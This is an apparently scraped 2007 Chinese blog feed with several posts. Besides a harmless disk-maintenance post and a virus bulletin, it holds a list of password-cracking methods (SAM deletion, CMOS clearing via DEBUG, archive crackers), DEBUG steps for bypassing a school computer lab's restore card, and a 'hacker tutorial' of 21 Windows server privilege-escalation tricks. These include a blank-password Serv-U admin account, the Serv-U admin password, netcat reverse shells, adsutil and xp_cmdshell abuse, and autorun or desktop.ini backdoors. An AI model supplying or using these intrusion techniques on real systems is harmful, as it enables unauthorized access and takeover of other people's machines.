类别:操作系统 查看评论]]> 2007-06-25 09:24 http://hi.baidu.com/52138881/blog/item/a2bf7a4e01638bc8d0c86a57.html <![CDATA[教大家电脑中十二种常用密码破解法]]> 在日常操作中,我们经常要输入各种各样的密码,例如开机时要输入密码,QQ时也要先输入密码,
假如你忘记了这些密码,就有可能用不了机器、打不开文件、不能聊天……

  也许还会造成很大的损失!下面我们就介绍电脑操作中常用密码的破解方法,希望能解你燃眉之
急!

  一、遗忘了SYSTEM密码

  如果你遗忘了CMOS设置中的SYSTEM密码,就无法启动机器了,解决的办法只能是:打开机箱,
把电池取下、正负极短接,给 CMOS 放电,清除CMOS中的所有内容(当然也就包括密码),然后重新
开机进行设置。

  注意:有些主板设置了CMOS密码清除跳线,请参照主板说明书将该跳线短接,这样也可以清除
CMOS密码。

  二、遗忘了SETUP密码

  遗忘了该密码,就不能进行CMOS设置了。如果你能使用计算机,但不能进入CMOS设置,可以这
样解决:在DOS状态下启动DEBUG ,然后输入如下命令手工清除SETUP密码:

  _ o 70 16

  _ o 71 16

  _ q

  你也可以用CMOS密码破解软件来显示CMOS密码,这样的软件有很多,例如Cmospwd,它支持Acer
、AMI、AWARD、COMPAQ、DELL、IBM、PACKARD BELL、PHOENIX、ZENITH AMI等多种BIOS),在DOS下
启动该程序,CMOS密码就会显示出来。

  三、遗忘了Windows登录密码

  WinMe/98下对策:开机后按F8键选择DOS启动,然后删除Windows 安装目录下的*.PWL密码文件
、以及Profiles子目录下的所有个人信息文件,重新启动Windows后,系统会弹出一个不包含任何用
户名的密码设置框,此时无需输入任何内容,直接单击“确定”,登录密码即被删除。

  另外,将注册表数据库HKEY_LOCAL_MACHINE、Network、Logon 分支下的UserProfiles修改为“
0”,然后重新启动Windows也可达到同样目的。

  WinXP/2000下对策:删除系统安装目录system32 config下的SAM文件,重新启动,此时管理员
Administrator账号已经没有密码了,用Administrator帐户登陆系统,不用输入任何密码,进入系
统后再重新设置登陆帐户密码即可。

  四、遗忘了Windows屏保密码

  解决方法:在开机后按F8键,选择安全模式启动,进入Windows 后,右击桌面空白处,从弹出
的快捷菜单中选择“属性”/屏幕保护,取消“密码保护”即可。

  五、遗忘了Windows电源管理密码

  Windows的电源管理功能也可以设置密码,启用此功能后,当系统从节能状态返回时就会要求输
入密码。

  如果你遗忘了该密码,可以使用前面破解Windows登录密码的那种方法去破解。

  六、遗忘了微软Office密码

  解决方法:使用破解Office系列文档密码的软件,这样的软件有很多,例如AOPR(下载网址
http://www.elcomsoft.com/),该软件可以同时对微软Office系列Word、Excel及Access等软件所生
成的密码进行破解,还可以对Word的*.DOT模板文件的密码进行搜索。

七、遗忘了WinZip压缩包密码

  解决方法:用软件UZPC(Ultra Zip Password Cracker,找回丢失的密码。使用该软件时要先设
置适当的解密方式,例如“后门方式”、“穷举方式”、“字典方式”和“模式匹配方式”等,一
般采用“Brute Force穷举方式”,然后软件就会对所有可能的密码进行测试,直至找出最后的结果


  八、遗忘了RAR压缩包密码

  遗忘了RAR压缩包密码后,你可下载一个CRARK软件来对其进行破解,它主要通过命令行来实现
对RAR压缩包的密码进行破解。使用时一般只需直接使用“CRARK RAR压缩包文件名”命令,利用缺
省参数即可进行破解。

  九、遗忘了QQ/ICQ密码

  为保护QQ密码,你应该赶快申请密码保护。假如你忘记了QQ密码、或者密码被盗时,只需填写
正确的信息即可取回。

  如果你要找回ICQ密码,可以使用软件ICQ Password Revealer,这是一个DOS下的命令行实用软
件,你只需在ICQ安装文件夹的NEWDB子文件夹下执行该文件,然后按照屏幕提示输入自己的UIN,系
统即会找回“久违”的ICQ密码。

  十、遗忘了Outlook Express密码

  如果你忘了密码,无法进入OutLook Express阅读收到的邮件、使用通讯簿等,可以这样破解:
重启计算机并按F8,选择“安全模式”,再启动OE就不需要密码了,然后你可以重建一个用户(不能
修改密码),把信息导入新用户信箱即可。

  十一、遗忘了Foxmail帐户密码

  解决方法:消除忘记的Foxmail帐户密码。首先打开Foxmail,新建一个帐户(帐户名任意,例如
如lacl1),然后退出Foxmail;运行Windows资源管理器,找到Foxmail\MAIL\lacl1文件夹,里边
有个“account.stg”,把它复制到忘记密码的帐户(例如“lacl”)目录中,直接覆盖原来的
“account.stg”文件;再重新运行Foxmail,打开忘记密码的帐户,呵呵,怎么连“口令提示框”
也没有?现在你就可以直接打开忘记密码的帐户,而且帐户中原来的邮件一封都不会少!

  十二、查看“*”密码

  许多密码在屏幕上都是以“*”显示的,因此我们无法直接看到密码的原始字符,如果你使用专
门破解“*”密码的软件,即可查出这些密码的原始字符。

  这样的软件有很多,例如Win2000/Win98下你可用iOpus Password Recovery,WinXP下可用
Password Spectator Pro。使用时,只需先打开显示“*”的窗口,启动这类软件,然后按住Ctrl键
、在密码栏中按下鼠标左键,这些“*”密码的原始字符就会显示出来了

类别:默认分类 查看评论]]> 2007-06-25 09:22 http://hi.baidu.com/52138881/blog/item/0ca7f91bc72be61b8718bf56.html <![CDATA[修改Windows配置 让电脑硬盘运行更快]]>
  你有没有发现让硬盘运行更快的秘密?就是删除无用的文件,并整理你的磁盘碎片。我已经准备好了工具,也有了窍门,所以请接着往下读……

  困扰:我运行了Windows磁盘碎片整理程序,然而当我再使用另一种磁盘碎片整理工具时,它告诉我硬盘还是有许多碎片文件。我应该相信哪一个?

  解决:Windows是正确的?别这么说。首先,Windows的工具会忽略系统还原点文件,我们每天都会创建和删除这些文件,每天大约会占用13M硬盘空间(在我自己的电脑上是这样),它们在硬盘上是分散而不连续的。而第三方的磁盘整理工具允许你决定如何进行磁盘整理——比如,把这些文件紧紧地打包起来。

  我推荐的一个磁盘整理工具是Golden Bow System的价值40美元的Vopt 8。这个程序兼容Vista和XP系统,而且能对还原点文件进行整理。除了能整理磁盘以外,Vopt还有许多其它小工具,可以删除临时文件;它有个聪明的小功能就是可以关掉不必要的应用程序,包括Windows的各项服务;而且它还可以自动的整理多个硬盘,然而自动关机。

  无论你使用哪个程序来整理硬盘,使用下面的方法都可以处理地更彻底:

  及早对硬盘进行整理,并且经常整理。 理论上,整理磁盘碎片有助于提高PC的性能。PCWorld实验室目前还没有找到能证实这种说法的信据。但在Bass 国际实验室,有着不同的说法。我有六个月没有整理我的硬盘了,在里面散落着成千上万个碎片文件。在运行磁盘碎片整理后,我的系统似乎快多了。

  打开的程序不会被整理,所以在开始碎片整理前,前关掉所有的应用程序。驻留在系统信息栏的程序也是如此。

  使用Ccleaner删除临时文件和网络缓存文件,这是一个免费的工具。你可以从这儿免费下载。

  小提示:无论你把硬盘整理得有多干净,我敢保证你的硬盘上一定有重复的文件。使用Duplicate File Finder把它们找出来吧。这个工具是免费的。你可以到这儿下载。

  困扰:我的硬盘上有一个很大的文件(hiberfil.sys)。我不能删除它,而在整理磁盘时它也不会被移动。有什么好建议吗?

  解决:那个巨大的文件时Windows自动生成的,如果你在休眼模式下关掉了电脑,Windows就会生成此文件。这儿有个好办法可以删除它。从控制面板里选择电源选项,然后选择休眠标签,去掉“启用休眠”前的选择框,然后点确定就好了。如果在整理磁盘后你想使用休眠功能,重复上述步骤然后选择“启用休眠”选择框即可。

  困扰:我正用一个程序检查我的硬盘,突然发现了tvDebug.log文件,我敢保证它足有2G大。这个文件是做什么用的,我可以删除它吗?

  解决:这个问题对我来说也是个很大的麻烦。这是ZoneAlarm防火墙程序储存的日志文件,它可以增加到非常大,而且除了拖慢碎片整理的速度以外别无他用。(它们保存在\Windows\Internet Logs文件夹里)要想删除这些文件是件痛苦的事情,因为当ZoneAlarm在运行时它们没法被删除。既然我最好一直让ZoneAlarm运行着,我使用了一个仳处理文件来自动地为我删除那些日志文件。你可以在这儿下载我压缩过的Zip文件,包括一份如何操作的说明和一个批处理文件。

类别:操作系统 查看评论]]> 2007-06-25 09:18 http://hi.baidu.com/52138881/blog/item/5bb35795840c1c0a7af4804b.html <![CDATA[dos下破解还原卡]]> 第一种破解率还可以.  
第二种好像是万能的(俺还没碰到破解不了的----见识短的表现-
第一种:
开机时(也就是在你曾经进入cmos的时刻),同时按住ctrl+home,这样你就进入了  
还原卡的密码输入窗口,只要输入正确的密码即可获得admin,以后随你怎样设置.  
关于是密码的问题:一般还原卡都有默认密码的,默认密码怎么找,很简单,到网上搜索  
关键词"还原卡"就行了,找到你用的那个牌子的还原卡,进入站点,在一个比较偏僻的角落  
一般可以找到默认密码的.  
而一般机房管理员是不会修改其默认密码的,比如俺学校的  
台湾远志牌的还原卡的默认密码是12345678,  
小哨兵的是manager, 机房管理员一个也没改,好爽!!!!!!!!!!  
不过我可没破坏任何东东,一旦惹怒了俺,嘿嘿....俺也不会破坏的,  
恶意破坏计算机就是对自己的不尊重!!!!  
如果管理员把密码改了呢?那就拿出宝刀---
方法二:
  
此法实施过程看起来挺麻烦,不过熟悉了操作起来超不过15秒的-  
高手sinister曰:  
其实所谓硬盘保护卡就是在ROM中写了一段HOOK INT 13的程序,屏蔽了  
一些功能调用如AH=3,5等,在中断向量表中INT 13的SEG,OFFSET  
描述为[13h*4+2],[13h*4],将此中的程序先保存后,再替换为自己的代码,  
当你AH=2的时,它便会call原始INT 13地址来完成操作.  
只要找到原始INT 13入口便可以为所欲为.  
不知看了这段感觉如何?慢慢消化吧.  
主要矛盾:关键是要找到原始的int 13入口.  
测试操作系统:win98  
测试对象: 台湾远志还原卡  
测试地点: 学校机房  
测试目的: 控制还原卡,但不破坏.  
注:本篇文章不对其实施过程中出现的任何不可预料的情况负责!!!!!  
具体过程如下:  
开机过程按住F8键,进入纯dos环境, 注";"后为注释.  
出现提示符c:,  
键入c:\debug,  
- a100  
xor ax,ax  
int 13  
int3  
; 寻找原始的int 13入口.  
然后输入t回车,不断的重复,直到显示的地址形如 F000:xxxx  
,后面的指令为:mov dl,80 (按q退出.  
记下这一地址, 在(0:13H*4)=0:4cH 处填入这个地址。  
例如俺的得到的地址是F000:9A95  
再次运行debug ,键入:  
-e 0:4c 95 9A 00 F0 ;e的作用将数据表"95 9A 00 f0",写入地址0:4c开始的字节中.  
-q  
注: 填的时候要仔细,填错的话会死机。ok,破解完成.  
这时在提示符c:\键入  
c:\win  
进入win98系统即可,那么这次你在win98系统中的一切操作,随着下一次  
的启动都会被还原卡存储起来。  
不过下一次进入系统的的时候,你还是需要重写地址0:4c,才可以让还原卡存储你的东东。  
这时只需要在纯dos下进入debug,键入  
-e 0:4c 95 9A 00 F0  
-q 即可。

类别:新手上路 查看评论]]> 2007-06-25 09:16 http://hi.baidu.com/52138881/blog/item/e4f6e74b8b656df283025c49.html <![CDATA[每日计算机病毒及木马播报]]> 网络游戏木马变种CIZ(Trojan.PSW.OnlineGames.ciz)”和“诡秘变种YBE(Backdoor.Delf.ybe)”病毒。“网络游戏木马变种CIZ”病毒专门窃取网络游戏账号,可造成多种杀毒软件无法运行,增加用户感染病毒的风险。“诡秘变种YBE”病毒会在中毒电脑上开设后门,使其可以被黑客远程控制,用来对外发动攻击或进行其它危险操作。

本日热门病毒:

  “网络游戏木马变种CIZ(Trojan.PSW.OnlineGames.ciz)”病毒:警惕程度★★★,木马病毒,通过网络传播,依赖系统:WIN9X/NT/2000/XP。

  病毒运行后将自身复制到Windows目录中,修改注册表实现自启动。病毒会中止多种杀毒软件的运行,造成它们无法使用。病毒会记录用户的键盘和鼠标操作,窃取网络游戏玩家的游戏账号和密码。

  “诡秘变种YBE(Backdoor.Delf.ybe)”病毒:警惕程度★★★,后门程序,通过网络传播,依赖系统:WIN 9X/NT/2000/XP。

  病毒运行后将自身复制到系统目录下,并且在注册表中添加启动项实现开机自动运行。它在中毒计算机中添加后门,黑客可以获取中毒电脑的一些系统信息。同时,黑客可以对中毒计算机进行远程控制,如:添加删除文件、重新启动计算机等。

  反病毒专家建议电脑用户采取以下措施预防该病毒:1、建立良好的安全习惯,不打开可疑邮件和可疑网站;2、很多病毒利用漏洞传播,一定要及时给系统打补丁;3、安装专业的防毒软件升级到最新版本,并打开实时监控程序;4、安装带有“木马墙”功能的个人防火墙软件,防止密码丢失。5、为本机管理员帐号设置较为复杂的密码,预防病毒通过密码猜测进行传播。6、登陆http://tool.ikaka.com下载并安装免费的瑞星卡卡3.2,并开启“IE防漏墙”功能,防止病毒通过IE漏洞侵入计算机。
类别:默认分类 查看评论]]> 2007-06-25 09:05 http://hi.baidu.com/52138881/blog/item/5897054a87cb582108f7ef43.html <![CDATA[黑客系列教程之21种提升权限的方法]]> 朋友有帮助!
1.radmin连接法
条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去。本人从来没成功过,端口到是给对方打开了。
2.paanywhere
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 这里下他的GIF文件,在本地安装pcanywhere上去。
3.SAM破解
C:\WINNT\system32\config\ 下他的SAM 破解之。
4.SU密码夺取
C:\Documents and Settings\All Users\「开始」菜单\程序\引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转。进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空。
[USER=WekweN|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYValues=
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限。
5.c:\winnt\system32\inetsrv\data\
引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行。
6.SU溢出提权
这个网上教程N多,不详细讲解了。
7.运行Csript
引用:运行"cscrīpt C:\Inetpub\Adminscrīpts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限。
用这个cscrīpt C:\Inetpub\Adminscrīpts\adsutil.vbs get w3svc/inprocessisapiapps ,查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll,再将asp.dll加入特权一族。asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样),我们现在加进去cscrīpt adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll" 。可以用cscrīpt adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了。
8.脚本提权
c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs。
9.VNC
默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password,我们可以用vncx4破解它。vncx4使用很简单,只要在命令行下输入:
c:\>vncx4 -W
然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。
10.NC提权
给对方来个NC,但是条件是你要有足够的运行权限,然后把它反弹到自己的电脑上。
11.社会工程学之GUEST提权
很简单,查看他的用户。一般来说看到帐户以后,密码尽量猜。可能用户密码一样,也可能是他QQ号、邮箱号、手机号。尽量看看。
12.IPC空连接
如果对方真比较白痴的话,扫他的IPC,如果运气好还是弱口令。
13.替换服务
这个不用说了吧?个人感觉相当复杂。
14.autorun .inf
autorun=xxx.exe,这个=后面自己写。加上只读、系统、隐藏属性,传到哪个盘都可以的,不相信他不运行。
15.desktop.ini与Folder.htt
引用:首先,我们现在本地建立一个文件夹,名字不重要。进入它,在空白处点右键,选择“自定义文件夹”(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder setting的文件架与desktop.ini的文件,(如果你看不到,先取消“隐藏受保护的操作系统文件”),然后我们在Folder setting目录下找到Folder.htt文件,记事本打开。在任意地方加入以下代码
,然后你将你的后门文件放在Folder setting目录下,把此目录与desktop.ini一起上传到对方任意一个目录下,就可以了。只要等管理员浏览了此目录,它就执行了我们的后门。
16.su覆盖提权
本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉,重起一下Serv-U,于是你上面的所有配置都与他的一模一样了。
17.SU转发端口
43958这个是 Serv -U 的本地管理端口,FPIPE.exe上传他,执行命令:
Fpipe –v –l 3333 –r 43958 127.0.0.1
意思是将4444端口映射到43958端口上。 然后就可以在本地安装一个Serv-u,新建一个服务器,IP填对方IP,帐号为LocalAdministrator 密码为$ak#.1k;0@p">#1@$ak#.1k;0@p,连接上后你就可以管理他的Serv-u了。
18.SQL帐户密码泄露
如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号(可以从他的连接数据库的ASP文件中看到),因为MSSQL是默认的SYSTEM权限。
引用:对方没有删除xp_cmdshell方法:使用Sqlexec.exe,在host一栏中填入对方IP,User与Pass中填入你所得到的用户名与密码。format选择xp_cmdshell”%s”即可。然后点击connect,连接上后就可以在CMD一栏中输入你想要的CMD命令了。
19.asp.dll
引用:因为asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定相同),我们现在加进去cscrīpt adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"。
好了,现在你可以用cscrīpt adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去
了。注意,用法中的get和set,一个是查看一个是设置,还有就是你运行上面的你要到C:\Inetpub\Adminscrīpts>这个目录下。
那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把asp.dll 剔出特权一族。也就是用set这个命令,覆盖掉刚才的那些东东。
20.Magic Winmail
前提是你要有个webshell 引用:http://www.***.com/forum/read.php?tid=3587这里去看吧。
21.DBO……
其实,提升权限的方式很多,就看大家怎么利用了。加油吧,将服务器控制到底!
类别:默认分类 查看评论]]> 2007-06-23 11:23 http://hi.baidu.com/52138881/blog/item/1d8d55306775a09ba8018e6d.html